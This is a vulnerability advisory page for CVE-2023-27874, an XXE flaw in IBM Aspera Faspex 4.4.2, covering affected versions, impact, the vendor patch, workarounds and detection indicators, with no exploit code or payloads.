Login Sign Up

CVE-2023-27874

9.9 CRITICAL
Remote Code Execution XXE

📋 TL;DR

IBM Aspera Faspex 4.4.2 contains an XML external entity injection (XXE) vulnerability that allows authenticated remote attackers to read arbitrary files and potentially execute commands on the server. This affects organizations using IBM Aspera Faspex for high-speed file transfers. The vulnerability requires authentication but poses critical risk due to the high CVSS score.

💻 Affected Systems

Products:
  • IBM Aspera Faspex
Versions: 4.4.2
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated access to exploit. All deployments of version 4.4.2 are vulnerable.

📦 What is this software?

Aspera Faspex by Ibm

View all CVEs affecting Aspera Faspex →

Aspera Faspex by Ibm

View all CVEs affecting Aspera Faspex →

Aspera Faspex by Ibm

View all CVEs affecting Aspera Faspex →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote authenticated attacker gains complete system control, reads sensitive files, executes arbitrary commands, and potentially pivots to other systems.

🟠

Likely Case

Attacker reads sensitive configuration files, extracts credentials, and gains foothold for further exploitation.

🟢

If Mitigated

With proper network segmentation and authentication controls, impact limited to isolated file transfer system.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

XXE vulnerabilities are well-understood and often weaponized quickly. Authentication requirement reduces immediate risk but doesn't eliminate it.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.4.2 Patch Level 1 or later

Vendor Advisory: https://www.ibm.com/support/pages/node/6964694

Restart Required: Yes

Instructions:

1. Download patch from IBM Fix Central. 2. Backup current installation. 3. Apply patch following IBM instructions. 4. Restart Aspera Faspex services. 5. Verify patch installation.

🔧 Temporary Workarounds

Disable XML external entity processing

all

Configure XML parser to disable external entity resolution

Modify XML parser configuration to set features: FEATURE_SECURE_PROCESSING=true, disallow-doctype-decl=true

Network segmentation

all

Restrict access to Aspera Faspex to trusted networks only

Configure firewall rules to limit inbound connections to specific IP ranges

🧯 If You Can't Patch

  • Implement strict authentication controls and monitor for suspicious login attempts
  • Deploy web application firewall with XXE protection rules

🔍 How to Verify

Check if Vulnerable:

Check Aspera Faspex version via admin interface or configuration files

Check Version:

Check Aspera Faspex web interface or configuration files for version information

Verify Fix Applied:

Verify patch installation through admin interface showing version 4.4.2 Patch Level 1 or later

📡 Detection & Monitoring

Log Indicators:

  • Unusual XML file uploads
  • Multiple authentication attempts from single source
  • System file access attempts

Network Indicators:

  • XML payloads with external entity references
  • Outbound connections to unexpected destinations

SIEM Query:

source="aspera" AND (xml OR xxe OR entity) AND (error OR exception OR failed)

📊 Metadata

CVE ID: CVE-2023-27874
CVSS v3 Score: 9.9 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE: CWE-611
Published: March 21, 2023
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-27874, you might also want to check these:

CVE-2022-22486 10.0

This CVE describes an XML External Entity (XXE) vulnerability in IBM Tivoli Workload Scheduler that ...

Same vulnerability type (CWE-611)
CVE-2025-30220 9.9

This XXE vulnerability in GeoServer's GeoTools Schema class allows attackers to read arbitrary files...

Same vulnerability type (CWE-611)
CVE-2021-43090 9.8

CVE-2021-43090 is an XML External Entity (XXE) vulnerability in soa-model's WSDLParser function that...

Same vulnerability type (CWE-611)